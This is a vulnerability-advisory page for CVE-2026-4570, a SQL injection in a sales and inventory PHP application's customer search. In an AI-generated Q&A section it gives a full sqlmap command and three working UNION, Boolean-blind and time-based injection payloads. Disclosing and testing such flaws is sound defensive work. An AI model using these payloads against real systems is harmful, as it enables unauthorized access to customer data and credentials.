CVE-2026-4570
SQL Injection in SourceCodester Sales Inventory /view_customers.php
Publication date: 2026-03-23
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| ahsanriaz26gmailcom | sales_and_inventory_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
How can this vulnerability impact me? :
[{'type': 'paragraph', 'content': 'This vulnerability can have serious impacts including unauthorized data exfiltration and database enumeration.'}, {'type': 'list_item', 'content': 'Attackers can retrieve sensitive information such as customer personally identifiable information (PII), credentials, and sales data.'}, {'type': 'list_item', 'content': "Attackers can enumerate database tables, columns, and schema details, compromising the confidentiality and integrity of the system's data."}] [1]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
Can you explain this vulnerability to me?
CVE-2026-4570 is a SQL Injection vulnerability found in SourceCodester Sales and Inventory System version 1.0, specifically in the file view_customers.php within the customer search functionality.
The issue arises because the searchtxt parameter in HTTP POST requests is not properly sanitized, allowing an authenticated attacker to inject arbitrary SQL commands.
This injection supports UNION-based, Boolean-based blind, and Time-based blind SQL injection techniques against a MySQL backend database.
Exploits can be executed remotely by sending crafted POST requests to the customers list page, enabling attackers to retrieve or manipulate sensitive data.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by testing the `searchtxt` parameter in HTTP POST requests to the /view_customers.php page for SQL injection flaws.'}, {'type': 'paragraph', 'content': 'One effective method is to use sqlmap, an automated SQL injection tool, to confirm the vulnerability.'}, {'type': 'list_item', 'content': 'Use the following sqlmap command to test the vulnerability: sqlmap -u "http://127.0.0.1:8089/view_customers.php" --data "searchtxt=test&Search=Search" --batch -v 6 --risk=3 --cookie "PHPSESSID=YOUR_COOKIE_HERE"'}, {'type': 'list_item', 'content': 'Alternatively, manually test with SQL injection payloads in the `searchtxt` POST parameter, such as UNION-based, Boolean-based blind, or time-based blind payloads.'}, {'type': 'list_item', 'content': "Example UNION-based payload: searchtxt=test' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787671,0x7044525250596b6f514258686f596c766c43524b7a416958474b4751495a6e597254534e674a6f65,0x71787a7071),NULL,NULL#&Search=Search"}, {'type': 'list_item', 'content': "Example Boolean-based blind payload: searchtxt=-4646' OR 2396=2396#&Search=Search"}, {'type': 'list_item', 'content': "Example Time-based blind payload: searchtxt=test' AND (SELECT 8866 FROM (SELECT(SLEEP(5)))qsSU)-- YCnJ&Search=Search"}] [1]
What immediate steps should I take to mitigate this vulnerability?
I don't know